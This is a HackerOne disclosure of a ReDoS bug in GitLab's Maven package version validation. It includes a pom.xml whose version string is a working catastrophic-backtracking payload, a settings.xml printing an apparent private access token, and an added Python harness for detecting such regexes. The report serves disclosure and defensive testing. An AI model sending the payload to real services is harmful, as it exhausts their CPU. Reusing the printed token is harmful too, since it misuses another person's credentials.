Maven package version ReDoS
**[HackerOne report #997961](https://hackerone.com/reports/997961)** by `anyday` on 2020-10-05, assigned to @ngeorge1:

[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)

## Report

Hello,

Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking: `aaaa....!` (https://gitlab.com/gitlab-org/gitlab/-/merge_requests/32925)

Steps to reproduce:

Follow the Maven guide `https://docs.gitlab.com/ee/user/packages/maven_repository/`

- generate a project: `mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false`
- create `settings.xml` with your access token (e.g. at `/root/.m2/settings.xml`):

```xml
<settings>
  <servers>
    <server>
      <id>gitlab-maven</id>
      <configuration>
        <httpHeaders>
          <property>
            <name>Private-Token</name>
            <value>srzc2-M3ysZx-ZEKQRki</value>
          </property>
        </httpHeaders>
      </configuration>
    </server>
  </servers>
</settings>
```

Edit `pom.xml` with:

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mycompany.mydepartment</groupId>
  <artifactId>my-project</artifactId>
  <packaging>jar</packaging>
  <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->
  <name>my-project</name>
  <url>http://maven.apache.org</url>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
  <properties><!-- Maven was complaining about something -->
    <maven.compiler.source>6</maven.compiler.source>
    <maven.compiler.target>6</maven.compiler.target>
  </properties>
  <repositories><!-- replace(3) 'gitlab.com' and 'PROJECT_ID' -->
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/packages/maven</url>
    </repository>
  </repositories>
  <distributionManagement>
    <repository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </repository>
    <snapshotRepository>
      <id>gitlab-maven</id>
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
    </snapshotRepository>
  </distributionManagement>
</project>
```

- `mvn deploy`

Video:

![mvn_redos.mp4](https://h1.sec.gitlab.net/a/2fa05a94-2501-459a-bbc8-53c9377c618f/mvn_redos.mp4)

#### Impact

Denial of service, CPU exhaustion

## Attachments

**Warning:** Attachments received through HackerOne, please exercise caution!

* [mvn_redos.mp4](https://h1.sec.gitlab.net/a/2fa05a94-2501-459a-bbc8-53c9377c618f/mvn_redos.mp4)

## How To Reproduce

Please add [reproducibility information] to this section:

1.
1.
1.

[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
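The report describes the classic catastrophic-backtracking shape: a version validator whose nested quantifier forces the regex engine to try every way of splitting a long run of `a`s before it concedes that the trailing `!` cannot match. The following is an added example, not part of the HackerOne report and not GitLab's code: a small Python harness that runs a regex in a forked child process under a time budget, so a validator can be probed with the report's `aaaa...!` input shape before it is exposed to user-controlled values. `VULNERABLE_VERSION_RE` and `SAFE_VERSION_RE` are constructed patterns that illustrate the bug class and its unambiguous rewrite; the regex GitLab actually shipped, and its fix, are in the merge request the report links. The child-process design is needed because CPython's `re` engine cannot be interrupted by a signal once a match is running; it assumes a POSIX host (the `fork` start method).

```python
"""Budgeted regex check for catastrophic backtracking (added example, not GitLab code)."""
import multiprocessing
import re
import time

# Constructed patterns in the shape of the reported bug; NOT GitLab's actual
# version regex. In the vulnerable one, "one or more segments, each one or more
# chars, dot optional" is ambiguous: a run of 'a's can be split into segments in
# 2^(n-1) ways, and the engine tries all of them once the trailing '!' fails.
VULNERABLE_VERSION_RE = r"([\w+-]+\.?)+"
# Unambiguous rewrite: segments are separated by a mandatory dot, so every input
# position can be consumed in exactly one way (as a side effect it also rejects
# a trailing dot, which the ambiguous pattern accepted).
SAFE_VERSION_RE = r"[\w+-]+(\.[\w+-]+)*"


def _match_worker(pattern, text, conn):
    # Runs in the forked child: report whether the full match succeeded and how long it took.
    started = time.perf_counter()
    matched = re.fullmatch(pattern, text) is not None
    conn.send((matched, time.perf_counter() - started))
    conn.close()


def match_within_budget(pattern, text, budget_seconds=0.5):
    """Return (matched, elapsed). matched is True/False when the regex finished
    inside the budget, or None when the child had to be killed (elapsed is then
    the budget, a lower bound on the real cost)."""
    ctx = multiprocessing.get_context("fork")  # assumption: POSIX host
    parent_end, child_end = ctx.Pipe(duplex=False)
    proc = ctx.Process(target=_match_worker, args=(pattern, text, child_end))
    proc.start()
    child_end.close()
    proc.join(budget_seconds)
    if proc.is_alive():
        proc.kill()
        proc.join()
        parent_end.close()
        return None, budget_seconds
    # Child finished: read its result (a crashed child that sent nothing counts as a failure).
    result = parent_end.recv() if parent_end.poll() else (None, budget_seconds)
    parent_end.close()
    return result


def redos_probe(pattern, prefix="a", suffix="!/x", lengths=(8, 16, 32), budget_seconds=0.5):
    """Feed prefix*n + suffix (the report's 'aaaa...!/x' shape) for growing n and
    return the first n at which the regex overran the budget, or None if every
    length finished in time. A superlinear pattern fails within a few doublings."""
    for n in lengths:
        matched, _ = match_within_budget(pattern, prefix * n + suffix, budget_seconds)
        if matched is None:
            return n
    return None


if __name__ == "__main__":
    for name, pattern in (("vulnerable", VULNERABLE_VERSION_RE), ("safe", SAFE_VERSION_RE)):
        print(f"{name:10s} accepts '1.0-SNAPSHOT': {match_within_budget(pattern, '1.0-SNAPSHOT')[0]}")
        print(f"{name:10s} first input length over budget: {redos_probe(pattern)}")
```

Both patterns accept an ordinary version such as `1.0-SNAPSHOT`; only the ambiguous one blows the budget on the `a`-run input, and it does so at a length (32 here) far shorter than the value in the report's `pom.xml`. A probe like this belongs in the test suite of any validator that sees attacker-controlled strings; in a Ruby codebase such as GitLab the same budget can be enforced in-process on Ruby 3.2 and later with `Regexp.timeout`, which turns a CPU-exhaustion bug into a fast, loggable rejection.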